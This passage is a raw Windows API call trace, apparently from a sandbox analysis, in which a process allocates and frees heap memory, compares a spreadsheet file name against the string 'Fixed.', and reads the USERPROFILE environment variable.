RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0261.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0261.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0261.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0261.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0261.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0261.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0261.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0261.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0261.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0261.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0261.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0261.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x26) returned 0x249f1d0 [0261.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0261.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D3BEewSKP- XS.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0261.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3BEewSKP- XS.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0261.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BEewSKP- XS.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0261.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EewSKP- XS.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0261.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ewSKP- XS.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0261.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wSKP- XS.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0261.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SKP- XS.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0261.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KP- XS.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0261.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P- XS.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0261.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="- XS.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0261.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" XS.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0261.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XS.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0261.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0261.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0261.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3538 [0261.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0261.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0261.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0261.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0261.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0261.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0261.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0261.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0261.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0261.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0261.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0261.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0261.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0261.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0261.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0261.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0261.182] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0261.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0261.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0261.183] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0261.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0261.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0261.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0261.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16e8 [0261.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0261.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0261.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0261.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0261.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0261.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0261.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0261.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0261.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0261.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0261.183] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0261.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0261.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0261.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fd8 [0261.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0261.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0261.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d38 [0261.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0261.184] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0261.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0261.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0261.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0261.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0261.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0261.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0261.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0261.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0261.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0261.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0261.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0261.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0261.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0261.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0261.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0261.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0261.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0261.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0261.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0261.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0261.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0261.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0261.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0261.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0261.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0261.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0261.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0261.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0261.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1198 [0261.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0261.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0261.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0261.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0261.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0261.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0261.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0261.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0261.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0261.186] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0261.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0261.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0261.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0261.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0261.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0261.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d38 [0261.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0261.186] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0261.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0261.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0261.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0261.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0261.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0261.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0261.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0261.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0261.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0261.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0261.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0261.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0261.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0261.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0261.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0261.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0261.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x2420898 [0261.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0261.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0261.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0261.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0261.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0261.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0261.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0261.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0261.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0261.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17d8 [0261.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0261.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0261.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0261.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0261.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c38 [0261.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0261.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0261.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0261.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fd8 [0261.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0261.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0261.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0261.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0261.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0261.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0261.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0261.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0261.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0261.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0261.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0261.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0261.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0261.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0261.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0261.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0261.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0261.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0261.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0261.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0261.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0261.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0261.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0261.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0261.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0261.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0261.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0261.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0261.190] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0261.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0261.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0261.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0261.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0261.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0261.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0261.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0261.190] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0261.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0261.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0261.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0261.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0261.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0261.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0261.191] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0261.197] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0261.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0261.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0261.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0261.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0261.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0261.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0261.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0261.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0261.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0261.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0261.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0261.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0261.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0261.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0261.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0261.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0261.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0261.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0261.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0261.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0261.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0261.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0261.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0261.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0261.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0261.198] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0261.198] 